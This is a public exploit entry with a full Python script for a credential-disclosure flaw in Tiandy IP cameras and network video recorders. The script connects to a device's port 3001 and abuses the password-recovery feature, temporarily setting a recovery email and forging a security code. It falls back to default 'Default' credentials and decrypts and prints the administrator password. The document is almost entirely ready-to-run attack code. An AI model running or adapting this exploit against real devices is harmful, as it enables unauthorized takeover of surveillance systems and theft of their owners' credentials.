Tiandy IPC and NVR version 9.12.7 suffer from a credential disclosure vulnerability.
31af0e01d3411bff4073c4969fab0aa5
# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A
# Requires Python 3 and PyCrypto
# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research
import sys
import hashlib
import base64
import socket
import struct
from Crypto.Cipher import DES
def main():
if len(sys.argv) != 2:
print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
exit(1)
host = sys.argv[1]
conn = Channel(host)
conn.connect()
crypt_key = conn.get_crypt_key(65536)
attempts = 2
tried_to_set_mail = False
ok = False
while attempts > 0:
attempts -= 1
code = get_psw_code(conn)
if code == False:
# psw not supported
break
elif code == None:
if not tried_to_set_mail:
print("No PSW data found, we'll try to set it...", file=sys.stderr)
tried_to_set_mail = True
if try_set_mail(conn, '[email protected]'):
code = get_psw_code(conn)
if code == None:
print("couldn't set mail", file=sys.stderr)
break
rcode, password = recover_with_code(conn, code, crypt_key)
if rcode == 5:
print('The device is locked, try again later.', file=sys.stderr)
break
if rcode == 0:
print('Admin', password)
ok = True
break
if tried_to_set_mail:
try_set_mail(conn, '')
if not code:
print("PSW is not supported, trying default credentials...", file=sys.stderr)
credentials = recover_with_default(conn, crypt_key)
if credentials:
user, pw = credentials
print(user, pw)
ok = True
if not ok:
print('Recovery failed', file=sys.stderr)
exit(1)
def try_set_mail(conn, target):
conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT'])
resp = conn.recv_msg()
return resp[4:7] == ['RESERVEPHONE', '2', '1']
def get_psw_code(conn):
conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1'])
resp = conn.recv_msg()
if resp[4] != 'FINDPSW':
return False
psw_reg = psw_data = None
if len(resp) > 7:
psw_reg = resp[6]
psw_data = resp[7]
if not psw_data:
return None
psw_type = int(resp[5])
if psw_type not in (1, 2, 3):
raise Exception('unsupported psw type: '+str(psw_type))
if psw_type == 3:
psw_data = psw_data.split('"')[3]
if psw_type == 1:
psw_data = psw_data.split(':')[1]
psw_key = psw_reg[:0x1f]
elif psw_type in (2, 3):
psw_key = psw_reg[:4].lower()
psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
code = hashlib.md5(psw_code).hexdigest()[24:]
return code
def recover_with_code(conn, code, crypt_key):
conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
resp = conn.recv_msg()
rcode = int(resp[6])
if rcode == 0:
return rcode, decode(resp[8].encode(), crypt_key).decode()
return rcode, None
def recover_with_default(conn, crypt_key):
res = conn.login_with_key(b'Default', b'Default', crypt_key)
if not res:
return False
while True:
msg = conn.recv_msg()
if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']:
return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode()
###
### lib/des.py
###
def reverse_bits(data):
return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data])
def pad(data):
if len(data) % 8:
padlen = 8 - (len(data) % 8)
data = data + b'\x00' * (padlen-1) + bytes([padlen])
return data
def unpad(data):
padlen = data[-1]
if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1):
data = data[:-padlen]
return data
def encrypt(data, key):
cipher = DES.new(reverse_bits(key), 1)
return reverse_bits(cipher.encrypt(reverse_bits(pad(data))))
def decrypt(data, key):
cipher = DES.new(reverse_bits(key), 1)
return unpad(reverse_bits(cipher.decrypt(reverse_bits(data))))
def encode(data, key):
return base64.b64encode(encrypt(data, key))
def decode(data, key):
return decrypt(base64.b64decode(data), key)
###
### lib/binproto.py
###
def recvall(s, l):
buf = b''
while len(buf) < l:
nbuf = s.recv(l - len(buf))
if not nbuf:
break
buf += nbuf
return buf
class Channel:
def __init__(self, ip, port=3001):
self.ip = ip
self.ip_bytes = socket.inet_aton(ip)[::-1]
self.port = port
self.msg_seq = 0
self.data_seq = 0
self.msg_queue = []
def fileno(self):
return self.socket.fileno()
def connect(self):
self.socket = socket.socket()
self.socket.connect((self.ip, self.port))
def reconnect(self):
self.socket.close()
self.connect()
def send_cmd(self, data):
self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
self.msg_seq += 1
def send_data(self, stream_type, data):
self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
self.data_seq += 1
def recv(self):
hdr = recvall(self.socket, 20)
if hdr[:4] == b'\xf1\xf5\xea\xf9':
lsize, stream_type = struct.unpack('<14xHI', hdr)
data = recvall(self.socket, lsize - 20)
if data[:4] != b'NVS\x00':
print(data[:4], b'NVS\x00')
raise Exception('invalid data header')
return None, [stream_type, data[8:]]
elif hdr[:4] == b'\xf1\xf5\xea\xf5':
lsize, dsize = struct.unpack('<6xH10xH', hdr)
if lsize != dsize + 20:
raise Exception('size mismatch')
msgs = []
for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
msg = msg.split('\t')
if '.' not in msg[0]:
msg = [self.ip] + msg
msgs.append(msg)
return msgs, None
else:
raise Exception('invalid packet magic: ' + hdr[:4].hex())
def recv_msg(self):
if len(self.msg_queue):
ret = self.msg_queue[0]
self.msg_queue = self.msg_queue[1:]
return ret
msgs, _ = self.recv()
if len(msgs) > 1:
self.msg_queue.extend(msgs[1:])
return msgs[0]
def send_msg(self, msg):
self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())
def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])
resp = self.recv_msg()
if resp[4:6] != ['LOGONFAILED', '3']:
print(resp)
raise Exception('unrecognized login response')
crypt_key = base64.b64decode(resp[8])
return crypt_key
def login_with_key(self, uname, pw, crypt_key):
self.reconnect()
hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())
self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
resp = self.recv_msg()
if resp[4] == 'LOGONFAILED':
return False
self.msg_queue = [resp] + self.msg_queue
return True
def login(self, uname, pw):
crypt_key = self.get_crypt_key(1, uname, pw)
if not self.login_with_key(uname, pw, crypt_key):
return False
return crypt_key
###
### lib/crypt.py
###
pat = b'abcdefghijklmnopqrstuvwxyz0123456789'
def td_asctonum(code):
if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
code += 0x20
if code not in pat:
return None
return pat.index(code)
def td_numtoasc(code):
if code < 36:
return pat[code]
return None
gword = [
b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]
def td_decrypt(data, key):
kdx = 0
ret = []
for idx, code in enumerate(data):
while True:
if kdx >= len(key):
kdx = 0
kcode = key[kdx]
knum = td_asctonum(kcode)
if knum is None:
kdx += 1
continue
break
if code not in gword[knum]:
return None
cpos = gword[knum].index(code)
ret.append(td_numtoasc(cpos))
kdx += 1
return bytes(ret)
if __name__ == '__main__':
main()